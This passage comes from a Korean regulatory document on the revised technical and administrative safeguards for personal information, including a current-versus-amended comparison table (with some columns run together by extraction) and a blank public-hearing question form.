처리시스템에서 개인정보의 출력시 ( 인쇄, 화면표시, 파일생성 등 ) 용도를 특정하여야 하며, 용도에 따라 출력 항목을 최소화 한다. 2정보통신서비스제공자등은 개인정보취급자가 개인정보를 종이로 인 쇄하거나, 디스켓, 콤팩트디스크 등 이동 가능한 저장매체에 복사할 경우 다음 각 호의 사항을 기록하고 개인정보관리책임자의 사전승인을 받도록 조치한다. 출력 복사물로부터 다시출력 또는 복사하는 경우도 또한 같다. 1. 출력 복사물 일련번호 2. 출력 복사물의 형태 3. 출력 복사 일시 4. 출력 복사의 목적 5. 출력 복사를 한 자의 소속 및 성명 6. 출력 복사물을 전달 받을 자 7. 출력 복사물의 파기일자 8. 출력 복사물의 파기 책임자 3제2 항에 의한 출력 복사물에는 정보통신서비스제공자의 명칭 및 제2 항제 1 호의 일련번호를 표시한다. 다만, 우편발송, 고지서 발급 등을 위하여 개인단위로 종이에 인쇄하는 경우는 일련번호를 표시하지 않아도 된다. 4개인정보관리책임자는 제2 항의 사전승인을 함에 있어 제2 항 각 호의 사항이 법에 위배되는지 여부를 확인하고, 개인정보취급자가 출력 복사 물을 불법 유출하면 법에 따라 책임을 지게 됨을 승인 받고자 하는 개인정보 - 57 -
취급자에게 주지시킨다. 제9 조 ( 개인정보 표시 제한 보호조치 ) 정보통신서비스 제공자 등은 개인정 보 업무처리를 목적으로 개인정보의 조회, 출력 등의 업무를 수행하는 과정에서 개인정보보호를 위하여 개인정보를 마스킹하여 표시제한 조치 를 취하는 경우에는 다음의 원칙으로 적용할 수 있다. 1. 성명 중 이름의 첫 번째 글자 이상 2. 생년월일 3. 전화번호 또는 휴대폰 전화번호의 국번 4. 주소의 읍 면 동 5. 인터넷주소는 버전 4 의 경우 17~24 비트 영역, 버전 6 의 경우 113~128 비 트 영역 부 칙 이기준은고시한날부터시행한다. 다만, 제 6 조제 2 항및제 4 항의경우 2010 년 1 월 29 일부터시행한다. - 58 -
[ 첨부 2] - 59 -
개인정보의기술적 관리적보호조치기준 대비표 현행 개정안 제1조 ( 목적 ) 이기준은 정보통신망이용촉제1조 ( 목적 ) 이기준은 정보통신망이용촉진및정보보호등에관한법률 ( 이하진및정보보호등에관한법률 ( 이하 법 이라한다 ) 제28조제1항및동법시행 법 이라한다 ) 제28조제1항및동법시행령제15조제2항의규정에의하여정보통령제15조제6항의규정에의하여정보통신서비스제공자등이이용자의개인정보를신서비스제공자등이이용자의개인정보를취급함에있어서개인정보가분실 도난 취급함에있어서개인정보가분실 도난 누출 변조 훼손등이되지아니하도록누출 변조 훼손등이되지아니하도록안전성을확보하기위하여취하여야하는안전성을확보하기위하여취하여야하는기술적 관리적보호조치의구체적인기준기술적 관리적보호조치의구체적인기준을정하는것을목적으로한다. 을정하는것을목적으로한다. < 신설 > 제2조 ( 정의 ) 이기준에서사용하는용어의뜻은다음과같다. 1. 개인정보관리책임자 라함은정보통신서비스제공자의사업장내에서이용자의개인정보보호업무를총괄하거나업무처리를최종결정하는임직원을말한다. 2. 개인정보취급자 라함은개인정보보호를위한기술적 관리적보호조치를실제구현운영하거나, 업무상개인정보취급이불가피한자를말한다. 3. 개인정보처리시스템 이라함은개인정보를처리할수있도록체계적으로구성한시스템을말한다. 4. 비밀번호 라함은이용자및개인정보취급자등이시스템또는정보통신망에접속할때식별자와함께입력하여정당한접속권한을가진자라는것을식별할수있도록시스템에전달해야하는고유의문자열로서타인에게공개되지않는정보를말한다. - 61 -
현행 개정안 5. 접속기록 이라함은이용자또는개인정 보취급자등이개인정보처리시스템에접속 하여수행한내역에대하여식별자, 접속 일시, 접속지를알수있는정보등접속 한사실을전자적으로기록한것을말한 다. 6. 바이오정보 라함은지문얼굴홍채정 맥음성필적등개인을식별할수있는 신체적또는행동적특징에관한정보로서 그로부터가공되거나생성된정보를포함 한다. 7. P2P(Peer to Peer) 라함은정보통신망 을통해서버의도움없이개인과개인이 직접연결되어파일을공유하는것을말한 다. 8. 공유설정 이라함은컴퓨터소유자의파 일을타인이조회 변경 복사등을할수 있도록설정하는것을말한다. 9. 보안서버 라함은정보통신망에서이용 자개인컴퓨터와웹서버사이에송수신되 는정보를암호화하여전송하는서버를말 한다. 10. SSL(Secure Socket Layer) 라함은데 이터를송수신하는두종단간에인증, 암 호화, 무결성을보장하는업계표준통신 규약을말한다. 11. 인증정보 라함은개인정보처리시스템 또는정보통신망을관리하는시스템등이 요구한식별자의신원을검증하는데사용 되는정보를말한다. 제2조 ( 개인정보관리계획의수립 시행 ) 정제3조 ( 내부관리계획의수립 시행 ) 1개인보통신서비스제공자등은개인정보가분정보보호조직의구성및운영은다음각실 도난 누출 변조 훼손등이되지아호의사항을포함하여야한다. 니하도록다음각호의사항을내용으로하는개인정보관리계획을수립 이행한다. - 62 -
현행 1. 개인정보관리책임자의지정등개인정보보 호조직의구성 운영에관한사항 2. 개인정보취급자의교육에관한사항 3. 제 3 조내지제 7 조에관한세부사항 4. 그밖에개인정보보호를위하여필요한 사항 개정안 1. 개인정보관리책임자의자격요건및지 정에관한사항 2. 개인정보관리책임자와개인정보취급자 의역할및책임에관한사항 3. 개인정보내부관리계획의수립및승인 에관한사항 4. 개인정보의기술적 관리적보호조치 이행여부의내부점검에관한사항 5. 그밖에개인정보보호를위해필요한 사항 < 신설 > 2 정보통신서비스제공자등은다음각호의사 항을포함하는개인정보보호교육계획을수 립하여개인정보관리책임자및개인정보취급 자를대상으로매년 2 회이상교육을실시하여 야한다. 1. 교육목적및대상 2. 교육내용 3. 교육일정및방법 < 신설 > 3 정보통신서비스제공자등은제 4 조에서제 8 제 3 조 ( 접근통제 ) 조까지의보호조치이행을위한세부적인추 진방안을마련하여야한다. 1정보통신서비스제공자등제4 조 ( 접근통제 ) 1정보통신서비스제공자등 은개인정보를처리할수있도록체계적으로 구성한데이터베이스시스템 ( 이하 개인정보 처리시스템 이라한다 ) 에대한접근권한을서 비스제공을위하여필요한최소한의인원에 게만부여한다. 은개인정보처리시스템에대한접근권한을 서비스제공을위하여필요한개인정보관리 책임자또는개인정보취급자에게만부여한 다. 2정보통신서비스제공자등은전보또는퇴직등인사이동이발생하여개인정보취급자가변경되었을경우지체없이개인정보처리시스템의접근권한을변경또는말소한다. 2 ~ 3 ( 현행과같음 ) 3정보통신서비스제공자등은제1 항및제2 항에의한권한부여, 변경또는말소에대한내역을기록하고, 그기록을최소 5년간보관한다. - 63 -
현행개정안 < 신설 > 4정보통신서비스제공자등은개인정보취급자가정보통신망을통해외부에서개인정보처리시스템에접속이필요한경우에는공인인증서등안전한인증수단을적용하여야한다. 4정보통신서비스제공자등은개인정보처리 5정보통신서비스제공자등은정보통신망을시스템을침입차단시스템과침입탐지시스템통한불법적인접근및침해사고방지를위해을설치하여보호한다. 다음각호의기능을포함한시스템을설치 운영하여야한다. < 신설 > 1. 개인정보처리시스템에대한접속권한을 IP주소등으로제한하여인가받지않은접근을제한 < 신설 > 2. 개인정보처리시스템에접속한 IP 등을재분석하여불법적인개인정보유출시도를탐지 5정보통신서비스제공자등은이용자및개인 6정보통신서비스제공자등은이용자가안전한정보취급자가생일, 주민등록번호, 전화번호비밀번호를이용할수있도록비밀번호작성등추측하기쉬운숫자를패스워드로이용하규칙을수립하고, 이행한다. 지않도록패스워드작성규칙을수립하고이행한다. < 신설 > 7정보통신서비스제공자등은개인정보취급자를대상으로다음각호의사항을포함하는비밀번호작성규칙을수립하고, 이를적용 운용하여야한다. 1. 다음각목의문자종류중 2종류이상을조합하여최소 10자리이상또는 3종류이상을조합하여최소 8자리이상의길이로구성가. 영문대문자 (26개) 나. 영문소문자 (26개) 다. 숫자 (10개) 라. 특수문자 (32개) 2. 연속적인숫자나생일, 전화번호등추측하기쉬운숫자는사용불가 3. 비밀번호에유효기간을설정하여반기별 1회이상변경 - 64 -
현행 6정보통신서비스제공자등은취급중인개인정보가인터넷홈페이지, P2P, 공유설정등을통하여열람권한이없는자에게공개되지않도록개인정보처리시스템및개인정보취급자의 PC를설정한다. 개정안 8정보통신서비스제공자등은취급중인개인정보가인터넷홈페이지, P2P, 공유설정등을통하여열람권한이없는자에게공개되거나외부에유출되지않도록개인정보처리시스템및개인정보취급자의컴퓨터에조치를취하여야한다. 제4조 ( 접속기록의위 변조방지 ) 1정보통신제5조 ( 접속기록의위 변조방지 ) 1정보통신 서비스제공자등은개인정보취급자가개인정보처리시스템에접속하여개인정보를처리한경우에는처리일시, 처리내역등접속기록을저장하고이를월 1회이상정기적으로확인 감독한다. 서비스제공자등은개인정보취급자가개인정보처리시스템에접속한기록을월 1회이상정기적으로확인 감독하여야하며, 시스템이상유무의확인등을위해최소 6개월이상접속기록을보존 관리하여야한다. < 신설 > 2 단, 제1 항의규정에도불구하고 전기통신사업법 제5 조의규정에따른기간통신사업자의경우에는보존 관리해야할최소기간을 5년으로한다. 2정보통신서비스제공자등은개인정보처리시스템의접속기록이위 변조되지않도록별도저장장치에백업보관한다. 3정보통신서비스제공자등은개인정보취급자의접속기록이위 변조되지않도록별도의물리적인저장장치에보관하여야하며정기적인백업을수행하여야한다. 제5조 ( 개인정보의암호화 ) 1정보통신서비스제6조 ( 개인정보의암호화 ) 1정보통신서비스 제공자등은패스워드, 생체정보등본인임을인증하는정보에대해서는복호되지아니하도록일방향암호화하여저장한다. 제공자등은비밀번호및바이오정보는복호화되지아니하도록일방향암호화하여저장한다. < 신설 > 2정보통신서비스제공자등은주민등록번호, 신용카드번호및계좌번호에대해서는안전한암호알고리듬으로암호화하여저장한다. - 65 -
현행개정안 2정보통신서비스제공자등은정보통신망을 3 정보통신서비스제공자등은정보통신망을통해이용자의개인정보및인증정보를송 통해이용자의개인정보및인증정보를송 수신할때에는보안서버구축등의조치를수신할때는다음각호중하나의방식을통해이를암호화해야한다. 보안서버는다음갖춘안전한보안서버를구축 운영하여야각호의어느하나의기능을갖추어야한다. 한다. 1. 웹서버에 SSL(Secure Socket Layer) 인 1. 웹서버에 SSL(Secure Socket Layer) 인증서를설치하여개인정보를암호화하여증서를설치하여개인정보및인증정보송 수신하는기능를암호화하여송 수신하는기능 2. 웹서버에암호화응용프로그램을설치하 2. 웹서버에암호화응용프로그램을설치하여개인정보를암호화하여송 수신하는여개인정보및인증정보를암호화하여기능송 수신하는기능 3 정보통신서비스제공자등은이용자의개 인정보를 PC 에저장할때에는이를암호 화해야한다. 4 정보통신서비스제공자등은이용자의개 인정보를개인용컴퓨터 (PC) 에저장할때 에는이를암호화해야한다. 제6조 ( 컴퓨터바이러스방지 ) 1정보통신서비제7조 ( 악성프로그램방지 ) 정보통신서비스제스제공자등은개인정보처리시스템및개인정공자등은백신소프트웨어를월 1회이상주기보취급자가개인정보처리에이용하는정보적으로갱신 점검하고, 악성프로그램관련기기에컴퓨터바이러스, 스파이웨어등악성경보가발령된경우및백신소프트웨어또는프로그램의침투여부를항시점검 치료할운영체제제작업체에서업데이트공지가있수있도록백신소프트웨어를설치한다. 는경우에는최신소프트웨어로갱신 점검하여야한다. 2제1 항의규정에의한백신소프트웨어는월 < 삭제 > 1회이상주기적으로갱신 점검하고, 바이러스경보가발령된경우및백신소프트웨어제작업체에서업데이트공지가있는경우에는즉시최신소프트웨어로갱신 점검한다. 제7조 ( 출력 복사시보호조치 ) 1정보통신서제8조 ( 출력 복사시보호조치 ) 1( 좌동 ) 비스제공자등은개인정보처리시스템에서개인정보의출력시 ( 인쇄, 화면표시, 파일생성등 ) 용도를특정하여야하며, 용도에따라출력항목을최소화한다. - 66 -
현행 2정보통신서비스제공자등은개인정보취급자가개인정보를종이로인쇄하거나, 디스켓, 콤팩트디스크등이동가능한저장매체에복사할경우다음각호의사항을기록하고개인정보관리책임자의사전승인을받도록조치한다. 출력 복사물로부터다시출력또는복사하는경우도또한같다. 1. 출력 복사물일련번호 2. 출력 복사물의형태 3. 출력 복사일시 4. 출력 복사의목적 5. 출력 복사를한자의소속및성명 6. 출력 복사물을전달받을자 7. 출력 복사물의파기일자 8. 출력 복사물의파기책임자 3제2 항의의한출력 복사물에는정보통신서비스제공자의명칭및제2 항제1 호의일련번호를표시한다. 다만, 우편발송, 고지서발급등을위하여개인단위로종이에인쇄하는경우는일련번호를표시하지않아도된다. 4개인정보관리책임자는제2 항의사전승인을함에있어제2 항각호의사항이법에위배되는지여부를확인하고, 개인정보취급자가출력 복사물을불법유출하면법에따라책임을지게됨을승인받고자하는개인정보취급자에게주지시킨다. 개정안 ( 좌동 ) ( 좌동 ) ( 좌동 ) < 신설 > 제9조 ( 개인정보표시제한보호조치 ) 정보통신서비스제공자등은개인정보업무처리를목적으로개인정보의조회, 출력등의업무를수행하는과정에서개인정보보호를위하여개인정보를마스킹하여표시제한조치를취하는경우에는다음의원칙으로적용할수있다. 1. 성명중이름의첫번째글자이상 2. 생년월일 - 67 -
현행 부칙 개정안 3. 전화번호또는휴대폰전화번호의국번 4. 주소의읍 면 동 5. 인터넷주소는버전 4 의경우 17~24 비트 영역, 버전 6 의경우 113~128 비트영역 부칙 이기준은고시한날부터시행한다. 이기준은고시한날부터시행한다. 다만, 제 6 조 제 2 항및제 4 항의경우 2010 년 1 월 29 일부터 시행한다. - 68 -
[ 첨부 3] 개인정보의기술적 관리적보호조치기준 개정 ( 안 ) 공청회서면질의서 질의자소속답변 희망자질의제목질의내용 발표자또는토론자중답변을희망하시는분의성함을적으세요 1. - 69 -